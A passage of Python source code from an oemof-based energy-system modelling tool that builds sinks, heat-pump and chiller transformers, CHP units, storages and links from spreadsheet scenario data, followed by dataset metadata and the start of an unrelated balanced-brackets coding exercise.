At least the\n following key-value-pairs have to be included:\n\n - 'label'\n - 'fixed'\n - 'annual demand'\n - 'occupants'\n :type de: dict\n :param nodes_data: dictionary containing excel sheets\n :type nodes_data: dict\n\n Christian Klemm - christian.klemm@fh-muenster.de\n \"\"\"\n \n import richardsonpy.classes.occupancy as occ\n import richardsonpy.classes.electric_load as eload\n # Import Weather Data\n dirhi = weather_data[\"dirhi\"].values.flatten()\n dhi = weather_data[\"dhi\"].values.flatten()\n \n # Conversion of irradiation from W/m^2 to kW/m^2\n dhi = dhi / 1000\n dirhi = dirhi / 1000\n \n # Reads the temporal resolution from the scenario file\n ts = nodes_data['energysystem']\n temp_resolution = ts['temporal resolution'][1]\n \n # sets the occupancy rates\n nb_occ = de['occupants']\n \n # Workaround, because richardson.py only allows a maximum\n # of 5 occupants\n if nb_occ > 5:\n nb_occ = 5\n \n # sets the temporal resolution of the richardson.py time series,\n # depending on the temporal resolution of the entire model (as\n # defined in the input spreadsheet)\n if temp_resolution == 'H':\n timestep = 3600 # in seconds\n elif temp_resolution == 'h':\n timestep = 3600 # in seconds\n elif temp_resolution == 'min':\n timestep = 60 # in seconds\n elif temp_resolution == 's':\n timestep = 1 # in seconds\n else:\n raise SystemError('Invalid Temporal Resolution')\n \n # Generate occupancy object\n # (necessary as input for electric load gen)\n occ_obj = occ.Occupancy(number_occupants=nb_occ)\n \n # Generate stochastic electric power object\n el_load_obj = eload.ElectricLoad(occ_profile=occ_obj.occupancy,\n total_nb_occ=nb_occ, q_direct=dirhi,\n q_diffuse=dhi, timestep=timestep)\n \n # creates richardson.py time series\n load_profile = el_load_obj.loadcurve\n richardson_demand = (sum(el_load_obj.loadcurve)\n * timestep / (3600 * 1000))\n annual_demand = de['annual demand']\n \n # Disables the stochastic simulation of the total yearly demand\n # by scaling the generated time series using the total energy\n # demand of the sink generated in the spreadsheet\n demand_ratio = annual_demand / richardson_demand\n # sets nominal value\n args = {'nominal_value': 0.001 * demand_ratio}\n if de['fixed'] == 1:\n # sets attributes for a fixed richardson sink\n args.update({'fix': load_profile})\n elif de['fixed'] == 0:\n # sets attributes for an unfixed richardson sink\n args.update({'max': load_profile})\n # starts the create_sink method with the parameters set before\n self.create_sink(de, args)\n # returns logging info\n logging.info(' ' + 'Sink created: ' + de['label'])\n \n def __init__(self, nodes_data: dict, busd: dict, nodes: list, time_series,\n weather_data):\n \"\"\" Inits the sink class.\n ---\n Other variables:\n \n nodes_sinks: obj:'list'\n -- class intern list of sinks that are already created\n\n \"\"\"\n \n # Delete possible residues of a previous run from the class\n # internal list nodes_sinks\n self.nodes_sinks = []\n # Initialise a class intern copy of the bus dictionary\n self.busd = busd.copy()\n \n # Create sink objects\n for i, de in nodes_data['sinks'].iterrows():\n slps = \\\n ['efh', 'mfh', 'gmf', 'gpd', 'ghd', 'gwa', 'ggb', 'gko', 'gbd',\n 'gba', 'gmk', 'gbh', 'gga', 'gha', 'h0', 'g0', 'g1', 'g2',\n 'g3', 'g4', 'g5', 'g6', 'l0', 'l1', 'l2']\n \n if de['active']:\n \n # Create Sinks un-fixed time-series\n if de['load profile'] == 'x':\n self.unfixed_sink(de)\n \n # Create Sinks with Time-series\n elif de['load profile'] == 'timeseries':\n self.timeseries_sink(de, 
time_series)\n \n # Create Sinks with SLP's\n elif de['load profile'] in slps:\n self.slp_sink(de, nodes_data, weather_data)\n \n # Richardson\n elif de['load profile'] == 'richardson':\n self.richardson_sink(de, nodes_data, weather_data)\n \n # appends created sinks on the list of nodes\n for i in range(len(self.nodes_sinks)):\n nodes.append(self.nodes_sinks[i])\n\n\nclass Transformers:\n \"\"\"\n Creates a transformer object.\n Creates transformers objects as defined in 'nodes_data' and adds\n them to the list of components 'nodes'.\n\n :param nodes_data: dictionary containing data from excel scenario\n file. The following data have to be provided:\n\n - label,\n - active,\n - transformer type,\n - input,\n - output,\n - output2,\n - efficiency,\n - efficiency2,\n - variable input costs,\n - variable output costs,\n - existing capacity,\n - max. investment capacity,\n - min. investment capacity,\n - periodical costs\n :type nodes_data: dict\n :param busd: dictionary containing the buses of the energy system\n :type busd: dict\n :param nodes: list of components created before(can be empty)\n :type nodes: list\n\n Christian Klemm - christian.klemm@fh-muenster.de\n \"\"\"\n # intern variables\n nodes_transformer = []\n busd = None\n \n def create_transformer(self, tf, inputs, outputs, conversion_factors):\n \"\"\" TODO Docstring missing \"\"\"\n self.nodes_transformer.append(solph.Transformer(\n label=tf['label'], **inputs, **outputs, **conversion_factors))\n logging.info(' ' + 'Transformer created: ' + tf['label'])\n \n def generic_transformer(self, tf: dict):\n \"\"\"\n Creates a Generic Transformer object.\n Creates a generic transformer with the parameters given in\n 'nodes_data' and adds it to the list of components 'nodes'.\n\n :param tf: dictionary containing all information for the\n creation of an oemof transformer. At least the\n following key-value-pairs have to be included:\n\n - 'label'\n - 'input'\n - 'output'\n - 'output2'\n - 'efficiency'\n - 'efficiency2'\n - 'variable input costs / (CU/kWh)'\n - 'variable output costs / (CU/kWh)'\n - 'variable output costs 2 / (CU/kWh)'\n - 'periodical costs / (CU/kWh)'\n - 'min. investment capacity / (kW)'\n - 'max. investment capacity / (kW)'\n - 'existing capacity / (kW)'\n - 'non-convex investment'\n - 'fix investment costs / (CU/a)'\n :type tf: dict\n\n Christian Klemm - christian.klemm@fh-muenster.de\n \"\"\"\n outputs = \\\n {self.busd[tf['output']]: solph.Flow(\n variable_costs=tf['variable output costs'],\n emission_factor=tf[\n 'variable output constraint costs'],\n investment=solph.Investment(\n ep_costs=tf['periodical costs'],\n periodical_constraint_costs=tf[\n 'periodical constraint costs'],\n minimum=tf['min. investment capacity'],\n maximum=tf['max. investment capacity'],\n existing=tf['existing capacity'],\n nonconvex=True if\n tf['non-convex investment'] == 1 else False,\n offset=tf['fix investment costs']))}\n conversion_factors = {self.busd[tf['output']]: tf['efficiency']}\n # Defines Capacity values for the second transformer output\n if tf['output2'] not in ['None', 'none', 0]:\n existing_capacity2 = \\\n ((float(tf['efficiency2']) / float(tf['efficiency']))\n * float(tf['existing capacity']))\n minimum_capacity2 = ((float(tf['efficiency2'])\n / float(tf['efficiency']))\n * float(tf['min. investment capacity']))\n maximum_capacity2 = ((float(tf['efficiency2'])\n / float(tf['efficiency']))\n * float(tf['max. 
investment capacity']))\n # Creates transformer object and adds it to the list of\n # components\n outputs.update(\n {self.busd[tf['output2']]: solph.Flow(\n variable_costs=tf['variable output costs 2'],\n emission_factor=tf[\n 'variable output constraint costs 2'],\n investment=solph.Investment(\n ep_costs=0,\n existing=existing_capacity2,\n minimum=minimum_capacity2,\n maximum=maximum_capacity2,\n nonconvex=True if\n tf['non-convex investment'] == 1 else False,\n offset=tf['fix investment costs']))})\n conversion_factors.update(\n {self.busd[tf['output2']]: tf['efficiency2']})\n outputs = {\"outputs\": outputs}\n \n conversion_factors = {\"conversion_factors\": conversion_factors}\n inputs = {\"inputs\": {self.busd[tf['input']]: solph.Flow(\n variable_costs=tf['variable input costs'],\n emission_factor=tf['variable input constraint costs'])\n }}\n self.create_transformer(tf, inputs, outputs, conversion_factors)\n\n def compression_heat_transformer(self, tf: dict, data):\n \"\"\"\n Creates a Compression Heat Pump or Compression Chiller by using\n oemof.thermal and adds it to the list of components 'nodes'.\n Parameters are given in 'nodes_data' are used .\n \n :param tf: has to contain the following keyword arguments\n \n - 'label'\n - 'variable input costs / (CU/kWh)'\n - 'variable output costs / (CU/kWh)'\n - 'min. investment capacity / (kW)'\n - 'max. investment capacity / (kW)'\n - 'existing capacity / (kW)'\n - 'transformer type': 'compression_heat_transformer'\n - 'mode':\n - 'heat_pump' or\n - 'chiller'\n - 'heat source'\n - 'temperature high'\n - 'temperature low'\n - 'quality grade'\n - 'area'\n - 'length of the geoth. probe'\n - 'heat extraction'\n - 'min. borehole area'\n - 'temp. threshold icing'\n - 'factor icing'\n :type tf: dict\n :param data: Dataframe containing all temperature information \\\n for the low temperature source. At least the \\\n following key-value-pairs have to be included:\n\n - 'ground_temp'\n - 'groundwater_temp'\n - 'temperature'\n - 'water_temp'\n :type data: pandas.core.frame.Dataframe\n\n :raise SystemError: choosen heat source not defined\n\n Janik Budde - Janik.Budde@fh-muenster.de\n Yannick Wittor - yw090223@fh-muenster.de\n \"\"\"\n \n # import oemof.thermal in order to calculate the cop\n import oemof.thermal.compression_heatpumps_and_chillers \\\n as cmpr_hp_chiller\n import math\n\n # creates one oemof-bus object for compression heat transformers\n # depending on mode of operation\n if tf['mode'] == 'heat_pump':\n temp = '_low_temp'\n elif tf['mode'] == 'chiller':\n temp = '_high_temp'\n else:\n raise ValueError(\"Mode of \" + tf['label']\n + \"contains a typo\")\n bus = solph.Bus(label=tf['label'] + temp + '_bus')\n \n # adds the bus object to the list of components \"nodes\"\n self.nodes_transformer.append(bus)\n self.busd[tf['label'] + temp + '_bus'] = bus\n \n # returns logging info\n logging.info(' ' + 'Bus created: ' + tf['label'] + temp + '_bus')\n \n # differentiation between heat sources under consideration of mode\n # of operation\n # ground as a heat source referring to vertical-borehole\n # ground-coupled compression heat transformers\n if tf['heat source'] == \"Ground\":\n \n # borehole that acts as heat source for the transformer\n cmpr_heat_transformer_label = tf['label'] + \\\n temp + '_ground_source'\n \n # the capacity of a borehole is limited by the area\n heatsource_capacity = \\\n tf['area'] * \\\n (tf['length of the geoth. probe']\n * tf['heat extraction']\n / tf['min. 
borehole area'])\n # ground water as a heat source\n elif tf['heat source'] == \"GroundWater\":\n \n # ground water that acts as heat source for the transformer\n cmpr_heat_transformer_label = tf['label'] + \\\n temp + '_groundwater_source'\n \n # the capacity of ambient ground water is not limited\n heatsource_capacity = math.inf\n \n # ambient air as a heat source\n elif tf['heat source'] == \"Air\":\n \n # ambient air that acts as heat source for the transformer\n cmpr_heat_transformer_label = tf['label'] + temp + '_air_source'\n \n # the capacity of ambient air is not limited\n heatsource_capacity = math.inf\n \n # surface water as a heat source\n elif tf['heat source'] == \"Water\":\n \n # ambient air that acts as heat source for the transformer\n cmpr_heat_transformer_label = tf['label'] + temp + '_water_source'\n \n # the capacity of ambient water is not limited\n heatsource_capacity = math.inf\n else:\n raise ValueError(tf['label'] + \" Error in heat source attribute\")\n maximum = heatsource_capacity\n # Creates heat source for transformer. The heat source costs are\n # considered by the transformer.\n self.nodes_transformer.append(\n solph.Source(label=cmpr_heat_transformer_label,\n outputs={self.busd[\n tf['label'] + temp + '_bus']: solph.Flow(\n investment=solph.Investment(ep_costs=0,\n minimum=0,\n maximum=maximum,\n existing=0),\n variable_costs=0)}))\n \n # Returns logging info\n logging.info(\n ' ' + 'Heat Source created: ' + tf['label']\n + temp + '_source')\n \n # set temp_high and temp_low and icing considering different\n # heat sources and the mode of operation\n if tf['heat source'] == \"Ground\":\n if tf['mode'] == 'heat_pump':\n temp_low = data['ground_temp']\n elif tf['mode'] == 'chiller':\n temp_high = data['ground_temp']\n elif tf['heat source'] == \"GroundWater\":\n if tf['mode'] == 'heat_pump':\n temp_low = data['groundwater_temp']\n elif tf['mode'] == 'chiller':\n temp_high = data['groundwater_temp']\n elif tf['heat source'] == \"Air\":\n if tf['mode'] == 'heat_pump':\n temp_low = data['temperature']\n elif tf['mode'] == 'chiller':\n temp_high = data['temperature'].copy()\n temp_low_value = tf['temperature low']\n # low temperature as formula to avoid division by zero error\n for index, value in enumerate(temp_high):\n if value == temp_low_value:\n temp_high[index] = temp_low_value + 0.1\n elif tf['heat source'] == \"Water\":\n if tf['mode'] == 'heat_pump':\n temp_low = data['water_temp']\n elif tf['mode'] == 'chiller':\n temp_high = data['water_temp']\n else:\n raise SystemError(tf['label'] + \" Error in heat source attribute\")\n \n if tf['mode'] == 'heat_pump':\n temp_threshold_icing = tf['temp. 
threshold icing']\n factor_icing = tf['factor icing']\n temp_high = [tf['temperature high']]\n elif tf['mode'] == 'chiller':\n # variable \"icing\" is not important in cooling mode\n temp_threshold_icing = None\n factor_icing = None\n temp_low = [tf['temperature low']]\n else:\n raise ValueError(\"Mode of \" + tf['label']\n + \"contains a typo\")\n # calculation of COPs with set parameters\n cops_hp = cmpr_hp_chiller.calc_cops(\n temp_high=temp_high,\n temp_low=temp_low,\n quality_grade=tf['quality grade'],\n temp_threshold_icing=temp_threshold_icing,\n factor_icing=factor_icing,\n mode=tf['mode'])\n logging.info(' ' + tf['label']\n + \", Average Coefficient of Performance (COP): {:2.2f}\"\n .format(numpy.mean(cops_hp)))\n\n # Creates transformer object and adds it to the list of components\n inputs = {\"inputs\": {self.busd[tf['input']]: solph.Flow(\n variable_costs=tf['variable input costs'],\n emission_factor=\n tf['variable input constraint costs']),\n self.busd[tf['label'] + temp + '_bus']: solph.Flow(\n variable_costs=0)}}\n outputs = {\"outputs\": {self.busd[tf['output']]: solph.Flow(\n variable_costs=tf['variable output costs'],\n emission_factor=tf[\n 'variable output constraint costs'],\n investment=solph.Investment(\n ep_costs=tf['periodical costs'],\n minimum=tf['min. investment capacity'],\n maximum=tf['max. investment capacity'],\n periodical_constraint_costs=tf[\n 'periodical constraint costs'],\n existing=tf['existing capacity']))}}\n conversion_factors = {\n \"conversion_factors\": {\n self.busd[tf['label'] + temp + '_bus']:\n [((cop - 1) / cop)/tf['efficiency']\n for cop in cops_hp],\n self.busd[tf['input']]: [1 / cop for cop in cops_hp]}}\n self.create_transformer(tf, inputs, outputs, conversion_factors)\n \n def genericchp_transformer(self, tf: dict, nd: dict):\n \"\"\"\n Creates a Generic CHP transformer object.\n Creates a generic chp transformer with the parameters given\n in 'nodes_data' and adds it to the list of components\n 'nodes'.\n\n :param tf: dictionary containing all information for the\n creation of an oemof transformer. At least the\n following key-value-pairs have to be included:\n\n - 'label'\n - 'input'\n - 'output'\n - 'output2'\n - 'efficiency'\n - 'efficiency2'\n - 'variable input costs / (CU/kWh)'\n - 'variable output costs / (CU/kWh)'\n - 'variable output costs 2 / (CU/kWh)'\n - 'periodical costs / (CU/kWh)'\n - 'min. investment capacity / (kW)'\n - 'max. 
investment capacity / (kW)'\n - 'existing capacity / (kW)'\n - 'non-convex investment'\n - 'fix investment costs / (CU/a)'\n :type tf: dict\n :param nd: dictionary containing parameters of the buses\n to be created.\n :type nd: dict\n\n Christian Klemm - christian.klemm@fh-muenster.de\n \"\"\"\n # counts the number of periods within the given datetime index\n # and saves it as variable\n # (number of periods is required for creating generic chp transformers)\n # Importing timesystem parameters from the scenario\n ts = next(nd['energysystem'].iterrows())[1]\n periods = int(ts['periods'])\n # creates genericCHP transformer object and adds it to the\n # list of components\n self.nodes_transformer.append(solph.components.GenericCHP(\n label=tf['label'],\n fuel_input={\n self.busd[tf['input']]: solph.Flow(\n H_L_FG_share_max=[\n tf['share of flue gas loss at max heat '\n 'extraction']\n for p in range(0, periods)],\n H_L_FG_share_min=[\n tf['share of flue gas loss at min heat '\n 'extraction']\n for p in range(0, periods)],\n variable_costs=tf[\n 'variable input costs'],\n emission_factor=\n tf['variable input constraint costs'])},\n electrical_output={\n self.busd[tf['output']]: solph.Flow(\n investment=solph.Investment(\n ep_costs=tf[\n 'periodical costs'],\n periodical_constraint_costs=tf[\n 'periodical constraint costs'],\n minimum=tf[\n 'min. investment capacity'],\n maximum=tf[\n 'max. investment capacity'],\n existing=tf['existing capacity'],\n nonconvex=True if\n tf['non-convex investment'] == 1 else False,\n offset=tf['fix investment costs']\n ),\n P_max_woDH=[\n tf['max. electric power without district '\n 'heating']\n for p in range(0, periods)],\n P_min_woDH=[tf['min. electric power without '\n 'district heating']\n for p in range(0, periods)],\n Eta_el_max_woDH=[\n tf['el. eff. at max. fuel flow w/o distr. '\n 'heating']\n for p in range(0, periods)],\n Eta_el_min_woDH=[\n tf['el. eff. at min. fuel flow w/o distr. '\n 'heating']\n for p in range(0, periods)],\n variable_costs=tf[\n 'variable output costs'],\n emission_factor=tf[\n 'variable output constraint costs']\n )\n },\n heat_output={self.busd[tf['output2']]: solph.Flow(\n Q_CW_min=[tf['minimal therm. condenser load to '\n 'cooling water']\n for p in range(0, periods)],\n variable_costs=tf[\n 'variable output costs 2'],\n emission_factor=tf[\n 'variable output constraint costs 2']\n )},\n Beta=[tf['power loss index']\n for p in range(0, periods)],\n # fixed_costs=0,\n back_pressure=True if tf['back pressure'] == 1 else False,\n ))\n\n # returns logging info\n logging.info(' ' + 'Transformer created: ' + tf['label'])\n\n def absorption_heat_transformer(self, tf, data):\n \"\"\"\n Creates an absorption heat transformer object with the parameters\n given in 'nodes_data' and adds it to the list of components 'nodes'\n\n\n :type tf: dict\n :param tf: has to contain the following keyword arguments\n - Standard Input information of transformer class\n - 'transformer type': 'absorption_heat_transformer'\n - 'mode': 'chiller'\n - 'name'\n - name refers to models of absorption heat transformers\n with different equation parameters. 
See documentation\n for possible inputs.\n - 'high temperature'\n - 'chilling temperature'\n - 'electrical input conversion factor'\n - 'recooling temperature difference'\n :param data: weather data\n :type data: dict\n\n Yannick Wittor - yw090223@fh-muenster.de\n \"\"\"\n # import oemof.thermal in order to calculate COP\n import oemof.thermal.absorption_heatpumps_and_chillers \\\n as abs_hp_chiller\n from math import inf\n import numpy as np\n\n # Import characteristic equation parameters\n char_para = pd.read_csv(os.path.join(\n os.path.dirname(__file__)) +\n '/technical_data/characteristic_parameters.csv')\n\n # creates one oemof-bus object for compression heat transformers\n # depending on mode of operation\n if tf['mode'] == 'heat_pump':\n temp = '_low_temp'\n elif tf['mode'] == 'chiller':\n temp = '_high_temp'\n else:\n raise ValueError(\"Mode of \" + tf['label']\n + \"contains a typo\")\n\n bus_label = tf['label'] + temp + '_bus'\n source_label = tf['label'] + temp + '_source'\n bus = solph.Bus(label=bus_label)\n\n # adds the bus object to the list of components \"nodes\"\n self.nodes_transformer.append(bus)\n self.busd[bus_label] = bus\n\n # returns logging info\n logging.info(' ' + 'Bus created: ' + bus_label)\n\n # Calculates cooling temperature in absorber/evaporator depending on\n # ambient air temperature of recooling system\n data_np = np.array(data['temperature'])\n t_cool = data_np + \\\n tf['recooling temperature difference']\n t_cool = list(map(int, t_cool))\n n = len(t_cool)\n\n # Calculation of characteristic temperature difference\n chiller_name = tf['name']\n ddt = abs_hp_chiller.calc_characteristic_temp(\n t_hot=[tf['high temperature']],\n t_cool=t_cool,\n t_chill=[tf['chilling temperature']],\n coef_a=char_para[(char_para['name'] ==\n chiller_name)]['a'].values[0],\n coef_e=char_para[(char_para['name'] ==\n chiller_name)]['e'].values[0],\n method='kuehn_and_ziegler')\n # Calculation of cooling capacity\n q_dots_evap = abs_hp_chiller.calc_heat_flux(\n ddts=ddt,\n coef_s=char_para[(char_para['name'] ==\n chiller_name)]['s_E'].values[0],\n coef_r=char_para[(char_para['name'] ==\n chiller_name)]['r_E'].values[0],\n method='kuehn_and_ziegler')\n # Calculation of driving heat\n q_dots_gen = abs_hp_chiller.calc_heat_flux(\n ddts=ddt,\n coef_s=char_para[(char_para['name'] ==\n chiller_name)]['s_G'].values[0],\n coef_r=char_para[(char_para['name'] ==\n chiller_name)]['r_G'].values[0],\n method='kuehn_and_ziegler')\n # Calculation of COPs\n cops_abs = \\\n [Qevap / Qgen for Qgen, Qevap in zip(q_dots_gen, q_dots_evap)]\n\n logging.info(' ' + tf['label']\n + \", Average Coefficient of Performance (COP): {:2.2f}\"\n .format(numpy.mean(cops_abs)))\n\n # creates a source object as high temperature heat source and sets\n # heat capacity for this source\n maximum = tf['heat capacity of source']\n self.nodes_transformer.append(\n solph.Source(label=source_label,\n outputs={self.busd[\n tf['label'] + temp + '_bus']: solph.Flow(\n investment=solph.Investment(ep_costs=0,\n minimum=0,\n maximum=maximum,\n existing=0),\n variable_costs=0)}))\n\n # Returns logging info\n logging.info(\n ' ' + 'Heat Source created:' + source_label)\n\n # Set in- and outputs with conversion factors and creates transformer\n # object and adds it to the list of components\n inputs = {\"inputs\": {self.busd[tf['input']]: solph.Flow(\n variable_costs=tf['variable input costs'],\n emission_factor=\n tf['variable input constraint costs']),\n self.busd[tf['label'] + temp + '_bus']: solph.Flow(\n 
variable_costs=0)}}\n outputs = {\"outputs\": {self.busd[tf['output']]: solph.Flow(\n variable_costs=tf['variable output costs'],\n emission_factor=tf['variable output constraint costs'],\n investment=solph.Investment(\n ep_costs=tf['periodical costs'],\n minimum=tf['min. investment capacity'],\n maximum=tf['max. investment capacity'],\n existing=tf['existing capacity']))}}\n conversion_factors = {\n \"conversion_factors\": {\n self.busd[tf['output']]:\n [cop for cop in cops_abs],\n self.busd[tf['input']]:\n tf['electrical input conversion factor']\n }}\n self.create_transformer(tf, inputs, outputs, conversion_factors)\n\n def __init__(self, nodes_data, nodes, busd, weather_data):\n \"\"\" TODO Docstring missing \"\"\"\n # renames variables\n self.busd = busd\n self.nodes_transformer = []\n\n # creates a transformer object for every transformer item within nd\n for i, t in nodes_data['transformers'].iterrows():\n if t['active']:\n # Create Generic Transformers\n if t['transformer type'] == 'GenericTransformer':\n self.generic_transformer(t)\n \n # Create Compression Heat Transformer\n elif t['transformer type'] == 'CompressionHeatTransformer':\n self.compression_heat_transformer(t, weather_data)\n \n # Create Extraction Turbine CHPs\n elif t['transformer type'] == 'ExtractionTurbineCHP':\n logging.info(' ' + 'WARNING: ExtractionTurbineCHP are'\n ' currently not a part of this model '\n 'generator, but will be added later.')\n \n # Create Generic CHPs\n elif t['transformer type'] == 'GenericCHP':\n self.genericchp_transformer(t, nodes_data)\n \n # Create Offset Transformers\n elif t['transformer type'] == 'OffsetTransformer':\n logging.info(\n ' ' + 'WARNING: OffsetTransformer are currently'\n + ' not a part of this model generator, but will'\n + ' be added later.')\n\n # Create Absorption Chiller\n elif t['transformer type'] == 'AbsorptionHeatTransformer':\n self.absorption_heat_transformer(t, weather_data)\n\n # Error Message for invalid Transformers\n else:\n logging.info(' ' + 'WARNING: \\''\n + t['label']\n + '\\' was not created, because \\''\n + t['transformer type']\n + '\\' is no valid transformer type.')\n \n # appends created transformers to the list of nodes\n for i in range(len(self.nodes_transformer)):\n nodes.append(self.nodes_transformer[i])\n\n\nclass Storages:\n \"\"\"\n Creates oemof storage objects as defined in 'nodes_data' and\n adds them to the list of components 'nodes'.\n\n :param nodes_data: dictionary containing parameters of storages\n to be created.The following data have to be\n provided:\n\n - 'label'\n - 'active'\n - 'bus'\n - 'existing capacity / (kWh)'\n - 'min.investment capacity / (kWh)'\n - 'max.investment capacity / (kWh)'\n - 'non-convex investments'\n - 'fix investment costs'\n - 'input/capacity ratio (invest)'\n - 'output/capacity ratio (invest)'\n - 'capacity loss'\n - 'efficiency inflow'\n - 'efficiency outflow'\n - 'initial capacity'\n - 'capacity min'\n - 'capacity max'\n - 'variable input costs'\n - 'variable output costs'\n :type nodes_data: dict\n :param busd: dictionary containing the buses of the energy system\n :type busd: dict\n :param nodes: list of components created before(can be empty)\n :type nodes: list\n\n Christian Klemm - christian.klemm@fh-muenster.de\n \"\"\"\n def generic_storage(self, s):\n \"\"\"\n Creates a generic storage object with the parameters\n given in 'nodes_data' and adds it to the list of components 'nodes'\n ----\n Keyword arguments:\n t : obj:'dict'\n -- dictionary containing all information for\n the creation 
of an oemof storage.\n \"\"\"\n\n # creates storage object and adds it to the\n # list of components\n self.nodes.append(\n solph.components.GenericStorage(\n label=s['label'],\n inputs={self.busd[s['bus']]: solph.Flow(\n variable_costs=s[\n 'variable input costs'],\n emission_factor=s[\n 'variable input constraint costs']\n )},\n outputs={self.busd[s['bus']]: solph.Flow(\n variable_costs=s[\n 'variable output costs'],\n emission_factor=s[\n 'variable output constraint costs']\n )},\n loss_rate=s['capacity loss'],\n inflow_conversion_factor=s[\n 'efficiency inflow'],\n outflow_conversion_factor=s[\n 'efficiency outflow'],\n invest_relation_input_capacity=s[\n 'input/capacity ratio'],\n invest_relation_output_capacity=s[\n 'output/capacity ratio'],\n investment=solph.Investment(\n ep_costs=s[\n 'periodical costs'],\n periodical_constraint_costs=s[\n 'periodical constraint costs'],\n existing=s[\n 'existing capacity'],\n minimum=s[\n 'min. investment capacity'],\n maximum=s[\n 'max. investment capacity'],\n nonconvex=True if\n s['non-convex investment'] == 1 else False,\n offset=s['fix investment costs'])))\n\n # returns logging info\n logging.info(' ' + 'Storage created: ' + s['label'])\n\n def stratified_thermal_storage(self, s, data):\n \"\"\"\n Creates a stratified thermal storage object with the parameters\n given in 'nodes_data' and adds it to the list of components 'nodes'\n\n\n :type s: dict\n :param s: has to contain the following keyword arguments:\n - Standard information on Storages\n - 'storage type': 'Stratified'\n - 'diameter'\n - 'temperature high'\n - 'temperature low'\n - 'U value /(W/(sqm*K))'\n @ Yannick Wittor - yw090223@fh-muenster.de, 26.01.2021\n \"\"\"\n # import functions for stratified thermal storages from oemof thermal\n from oemof.thermal.stratified_thermal_storage import calculate_losses\n # Import weather Data\n data.index = pd.to_datetime(data[\"timestamp\"].values, utc=True)\n data.index = pd.to_datetime(data.index).tz_convert(\"Europe/Berlin\")\n # calculations for stratified thermal storage\n loss_rate, fixed_losses_relative, fixed_losses_absolute = \\\n calculate_losses(\n s['U value'],\n s['diameter'],\n s['temperature high'],\n s['temperature low'],\n data['temperature'])\n\n # creates storage object and adds it to the\n # list of components\n self.nodes.append(\n solph.components.GenericStorage(\n label=s['label'],\n inputs={self.busd[s['bus']]: solph.Flow(\n variable_costs=s[\n 'variable input costs'],\n emission_factor=s[\n 'variable input constraint costs']\n )},\n outputs={self.busd[s['bus']]: solph.Flow(\n variable_costs=s[\n 'variable output costs'],\n emission_factor=s[\n 'variable output constraint costs']\n )},\n min_storage_level=s['capacity min'],\n max_storage_level=s['capacity max'],\n loss_rate=loss_rate,\n fixed_losses_relative=fixed_losses_relative,\n fixed_losses_absolute=fixed_losses_absolute,\n inflow_conversion_factor=s[\n 'efficiency inflow'],\n outflow_conversion_factor=s[\n 'efficiency outflow'],\n invest_relation_input_capacity=s[\n 'input/capacity ratio'],\n invest_relation_output_capacity=s[\n 'output/capacity ratio'],\n investment=solph.Investment(\n ep_costs=s[\n 'periodical costs'],\n periodical_constraint_costs=s[\n 'periodical constraint costs'],\n existing=s[\n 'existing capacity'],\n minimum=s[\n 'min. investment capacity'],\n maximum=s[\n 'max. 
investment capacity'],\n nonconvex=True if\n s['non-convex investment'] == 1 else False,\n offset=s['fix investment costs'])))\n # returns logging info\n logging.info(' ' + 'Storage created: ' + s['label'])\n \n def __init__(self, nodes_data: dict, nodes: list, busd: dict):\n \"\"\"\n Inits the storage class.\n\n Christian Klemm - christian.klemm@fh-muenster.de\n \"\"\"\n # renames variables\n self.busd = busd\n self.nodes = []\n\n # creates storage object for every storage element in nodes_data\n for i, s in nodes_data['storages'].iterrows():\n if s['active']:\n\n # Create Generic Storage\n if s['storage type'] == 'Generic':\n self.generic_storage(s)\n\n # Create Generic Storage\n if s['storage type'] == 'Stratified':\n self.stratified_thermal_storage(s,\n nodes_data['weather data'])\n\n # appends created storages to the list of nodes\n for i in range(len(self.nodes)):\n nodes.append(self.nodes[i])\n\n\nclass Links:\n \"\"\"\n Creates links objects as defined in 'nodes_data' and adds them\n to the list of components 'nodes'.\n\n # TODO Excel columns missing\n\n :param nodes_data: dictionary containing data from excel\n scenario file. The following data have to be\n provided:\n\n - 'active'\n - 'label'\n - '(un)directed'\n :type nodes_data: dict\n :param busd: dictionary containing the buses of the energy system\n :type busd: dict\n :param nodes: list of components created before(can be empty)\n :type nodes: list\n\n Christian Klemm - christian.klemm@fh-muenster.de\n \"\"\"\n # intern variables\n busd = None\n \n def __init__(self, nodes_data, nodes, bus):\n \"\"\"\n Inits the Links class.\n\n Christian Klemm - christian.klemm@fh-muenster.de\n \"\"\"\n # renames variables\n self.busd = bus\n # creates link objects for every link object in nd\n for i, link in nodes_data['links'].iterrows():\n if link['active']:\n if link['(un)directed'] == 'directed':\n ep_costs = link['periodical costs']\n elif link['(un)directed'] == 'undirected':\n ep_costs = link['periodical costs'] / 2\n else:\n raise SystemError('Problem with periodical costs')\n nodes.append(solph.custom.Link(\n label=link['label'],\n inputs={self.busd[link['bus1']]: solph.Flow(),\n self.busd[link['bus2']]: solph.Flow()},\n outputs={self.busd[link['bus2']]: solph.Flow(\n variable_costs=\n link['variable output costs'],\n emission_factor=\n link['variable constraint costs'],\n investment=solph.Investment(\n ep_costs=ep_costs,\n periodical_constraint_costs=link[\n 'periodical constraint costs'],\n minimum=link[\n 'min. investment capacity'],\n maximum=link[\n 'max. investment capacity'],\n existing=link[\n 'existing capacity'],\n nonconvex=True if\n link['non-convex investment'] == 1\n else False,\n offset=link[\n 'fix investment costs'])),\n self.busd[link['bus1']]: solph.Flow(\n variable_costs=\n link['variable output costs'],\n emission_factor=\n link['variable constraint costs'],\n investment=solph.Investment(\n ep_costs=ep_costs,\n periodical_constraint_costs=link[\n 'periodical constraint costs'],\n minimum=link[\n 'min. investment capacity'],\n maximum=link[\n 'max. 
investment capacity'],\n existing=link[\n 'existing capacity'],\n nonconvex=True if\n link['non-convex investment'] == 1\n else False,\n offset=link[\n 'fix investment costs'])), },\n conversion_factors={\n (self.busd[link['bus1']],\n self.busd[link['bus2']]): link['efficiency'],\n (self.busd[link['bus2']],\n self.busd[link['bus1']]):\n (link['efficiency']\n if link['(un)directed'] == 'undirected' else 0)}\n ))\n # returns logging info\n logging.info(' ' + 'Link created: ' + link['label'])\n","sub_path":"program_files/create_objects.py","file_name":"create_objects.py","file_ext":"py","file_size_in_byte":85067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"336990812","text":"'''\nProblem Statement\n\nGiven an expression string x. Examine whether the pairs and the orders of “{“,”}”,”(“,”)”,”“,”” are correct in exp.\n\nInput Format\n\nA single string s containing the parenthesis.\n\nConstraints\n\n1<=length of string<=1000\n\nOutput Format\n\nPrint \"1\" if brackets are balanced else print \"0\".\n\n\n'''\n\n\nclass Stack:\n def __init__(self):\n self.s=[] 